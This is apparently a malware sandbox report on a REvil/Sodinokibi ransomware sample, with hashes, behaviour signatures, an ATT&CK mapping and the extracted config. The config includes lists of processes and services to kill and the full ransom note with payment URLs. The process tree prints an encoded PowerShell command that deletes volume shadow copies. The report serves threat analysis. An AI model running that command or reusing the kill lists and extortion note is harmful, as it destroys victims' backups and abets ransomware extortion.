Overview

overview

10

Static

static

10

2024-03-08...il.exe

windows7-x64

10

2024-03-08...il.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    134s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08-03-2024 13:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-03-08_8be4b3f41ef22c97f04eeb68d490dd5b_revil.exe

  • Size

    123KB

  • MD5

    8be4b3f41ef22c97f04eeb68d490dd5b

  • SHA1

    e94debf303e6b83194e45659a7cb8f26b7ad8519

  • SHA256

    3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c

  • SHA512

    926102a46daf75c877f07870f0e0d298518f5699f453d525f946b8eaa9fed3934603cdd6e6f5e6e7c3be8825ebd3cf1a055f119bb7d862a3cfa7ff48cd436617

  • SSDEEP

    1536:7DvcP30ThpshwVs5OE8yNcYQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxN:yrSVhaNcYM8gnBR5uiV1UvQFOxN

Score
10/10
sodinokibi$2a$10$ctl6mpbcozzcr.aru3gxp.pcftg0jof6upmmrky0hc0o.x.alltz.4085persistenceransomware

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr
Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\8l8n326464-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 8l8n326464. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/ED36E0599C455637 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/ED36E0599C455637 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: S/n4SXWLFmqXfiUwz5n48En64dqFNgLxcA0H1PIbkNf8AUbrUCgTyjqpg9TcqQVA E/OkZgyUnj9HzCB96dyZosuEtRyafLBBgU/6jRRWufJGejo+HpE8oPabIFsiArHo vg14pqqnDSfY/d1GELwcYVzvOol+ovypd1hrRPEwMIY++WL5oI/3rSn+neY0kH7B rJqkV6AU/R40ozENGd52sKiI3mYWvl71oGCTjCnMUL09X21EQEiZBbrbTNeztMM7 ctEfDecFbLytJylS/mGXO4kjUdQ15Ob789bV+hQIqmX1wZpyfvd/4laP2NQOAlzF 6skqivwGgMeGS2byBfTbgiXOfwHVMpQ7dF4sWqLkjtw39pnbqZfmnaRws+aaCd/v 2NfMSjqTF9hKBxNYNqMmiZd0YaqB+Qvk49v5qAWWG4+cBn0vY1D95YPrmGMvpdgS Pyr+/nwD10TbDzVR9hh23pADU4wEecOSGhtAOK2Ix7FVuTOzmdefYrVxIYEn1v/Z u0vY5QwZR9ZeM/li8wTxp7dvc12tR4874MjnxwZE5FB777NJJ9mC6c/cHC6A1I8B bzyvXbIxuAzFBKEqthIhmQ6+4b6ScCVEHWO/C6o8Su8f3jPm6FQuUtlQ9HM9No/x oufxSTkKNQuhTtxuBk9H7cVw1NyK0IXP15g3SXY6Cmp2x/WJfK/PIvoHR1biW+pm GGWsDyv5ttpmpweXttfeF9+t/LJR8QVBjIVtuP+VVJieq5Jhy/hMbHn38564x8PQ rmpyflWwM7ubcv8Hk9FrRf5l17QkHbk/SfNM3x/0Nm+7E/GxMwHuuUIz6pe2sIY7 Uk3bnZ57yxv0jiydzrF2asfAjH5D0XuhvVQilaCqNyRPPB2xyoQaa0JTTdljBYon kSs0fvBVuYi1K0wh5950/yZduPp6tPlHZgfnx0mmw8LYnHCxuBbilwVZoP1CghUJ LcUmU5cfFERgcRm3bPz1UGfx1A16yv+wASGsI9aUohwspNmz6USgp+Xj5WSKUlqI dDvcjPTNoBilQufz/tYfMBWSjZ4ct6sfayA05/P9W9jg2+yJkqN+rWtW3d9zypkp 90ftYai183h9qCCN9V0W4yehanY+6MvFKcSAkHrsP6vSkiYR0LC9BZqJzFdHusAA QF1A5jGGNlDEvrf98gE/fIAyZyFF/WPWgYG2Xlg5pACyg7SQLSiL5t6m1PCBPWDL wQn6hTP/mWp+luF1h8f55C7ED7eIelAVPdkQQeVxU/BPdyHhLmZ5lqveJ64eVCAQ P/HuPlqQA8V4zqIDraHsedTREyK/shriTA/VZ/PQgVQj29lGeTMs7UPIJcw2Fque xeQ0SYf2AsQUYIlomKPlt+E+1RjJXkiJRnB7/fziOw7m8+Fharj5Eg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/ED36E0599C455637

http://decryptor.cc/ED36E0599C455637

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 40 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-08_8be4b3f41ef22c97f04eeb68d490dd5b_revil.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-08_8be4b3f41ef22c97f04eeb68d490dd5b_revil.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1996
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2564
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2708

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    3
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\8l8n326464-readme.txt
      Filesize

      6KB

      MD5

      11b9d2d5217bfc4fda939c4047649fa1

      SHA1

      54ad05694f5c001b28183774925e7a9ede677f6a

      SHA256

      ed790eeeb87e9df94e7dca2ae75e2e3c112aa06d923fc5896779f786991a4504

      SHA512

      ea6981824a65eea6b9fb248534b95f75e9ce7292a7b2ff63a02b1ceac225064b78ae6a11a18a7629fe7c99cc23f71dad0a7bbea840716f2fed91e445027341c9

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Cab6C9A.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar724C.tmp
      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      Download Submit
    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      d5f3d400639335eeecc68443fd9c68fe

      SHA1

      02805bf4c6da3974ab77d2c387b394ab75dbfe17

      SHA256

      56784add7c0f76909876645e997114b66de01e2835846a44ceb8f7175d4cdc27

      SHA512

      9b11b320df2e4023fc9c3dc7282c83dca6c1292093ba0e3eab58708a6efcd935ce3f69b1890e24627e8ca1d8476c0750798016bef37cd4b60e48b9f1adcede60

      Download Submit
    • memory/1908-0-0x00000000000D0000-0x00000000000F2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1908-513-0x00000000000D0000-0x00000000000F2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1996-8-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1996-10-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1996-13-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1996-12-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1996-11-0x0000000002A50000-0x0000000002AD0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/1996-9-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1996-7-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/1996-6-0x0000000002240000-0x0000000002248000-memory.dmp
      Filesize

      32KB

      Download
    • memory/1996-5-0x000000001B550000-0x000000001B832000-memory.dmp
      Filesize

      2.9MB

      Download